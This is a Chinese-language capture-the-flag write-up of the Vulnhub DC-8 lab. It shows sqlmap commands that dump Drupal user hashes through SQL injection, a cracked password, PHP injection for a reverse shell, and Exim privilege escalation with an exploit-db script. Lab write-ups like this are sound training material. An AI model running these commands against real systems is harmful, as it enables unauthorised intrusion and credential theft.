DC-8靶机解题思路

  • A+
所属分类:安全文章

说明:Vulnhub是一个渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习,实践。DC-8是本系列最后一幕,全程只有一个falg,获取root权限,以下内容是自身复现的过程,总结记录下来,如有不足请多多指教。


下载地址:

Download: http://www.five86.com/downloads/DC-8.zip


目标机IP地址:192.168.5.143
攻击机kali IP地址:192.168.5.135


arp-scan -l进行主机查找。

DC-8靶机解题思路


nmap -sS -sV -p- 192.168.5.143  端口扫描。

DC-8靶机解题思路


与DC-7一样后台同样使用了Drupal CMS。

DC-8靶机解题思路


web版本详情。

DC-8靶机解题思路


目录爆破发现:

http://192.168.5.143/robots.txt,访问页面中提示了一些路径。

DC-8靶机解题思路



发现注入点,点击Details。

DC-8靶机解题思路

DC-8靶机解题思路



数字型注入,sqlmap跑一波。爆出数据库。

sqlmap -u "http://192.168.5.143/?nid=1" --dbs

DC-8靶机解题思路


查看d7db数据库的所有的表,然后看一下users表中的所有字段。

sqlmap -u "http://192.168.5.143/?nid=1" -D d7db --tables

DC-8靶机解题思路

 sqlmap -u "http://192.168.5.143/?nid=1" -D "d7db"  -T "users" --columns

DC-8靶机解题思路


查看name字段与pass字段,获取用户与密码。

admin/$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

john/$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF


sqlmap -u "http://192.168.5.143/?nid=1" -D "d7db"  -T "users" -C  "name,pass" --dump

DC-8靶机解题思路



将admin,john 以及他们加密的密码分别进行保存,使用john工具进行解密。

john/turtle

DC-8靶机解题思路


访问登陆页面登陆后台。

DC-8靶机解题思路


进入后台后,根据DC7的渗透流程,可能会存在插入php代码的地方。不出所料如图所示。

DC-8靶机解题思路

DC-8靶机解题思路

DC-8靶机解题思路


编辑好设置信息后发邮件才可触发。

DC-8靶机解题思路


DC-8靶机解题思路


我们直接反弹shell。本地监听7777。

DC-8靶机解题思路


有个坑....在此处,先写上任意字符,然后在写php代码才行,还有就是上来不要着急编辑,先设置好Text format 

DC-8靶机解题思路

DC-8靶机解题思路


切换交互式shell。

python -c 'import pty;pty.spawn("/bin/bash")'

查找符合权限的文件。

find / -perm -u=s -type f 2>/tmp/null

DC-8靶机解题思路


发现exim4是可以用来提权的。

searchsploit  exim 一下,查看可以利用的漏洞

DC-8靶机解题思路


查看了一下版本信息,对照漏洞表选择利用方式。

DC-8靶机解题思路

DC-8靶机解题思路


该脚本有两种利用规则,分别为:Usage (setuid method) 、Usage (netcat method) 详情参照该链接。

https://www.exploit-db.com/exploits/46996


将脚本:set ff=unix一下然后保存,脚本改名为dc8.sh 上传到攻击机中。根据脚本中的使用方式,进行提权。

DC-8靶机解题思路

DC-8靶机解题思路


tmp可任意读写,将文件下载到tmp下执行。

DC-8靶机解题思路


开启Apache,攻击者直接将脚本下载到tmp下。

DC-8靶机解题思路


./dc8.sh -m netcat 提权成功。

DC-8靶机解题思路

DC-8靶机解题思路


DC系列将要告一段落,但是学习的道路永无止境。句号既是结束,又是起笔的开始,享受过程,充实人生。

我从来没有长大,但我从来没有停止过成长 

                                                                               ——阿瑟·克拉克



免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

DC-8靶机解题思路

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

DC-8靶机解题思路

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

DC-8靶机解题思路


本文始发于微信公众号(thelostworld):DC-8靶机解题思路

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: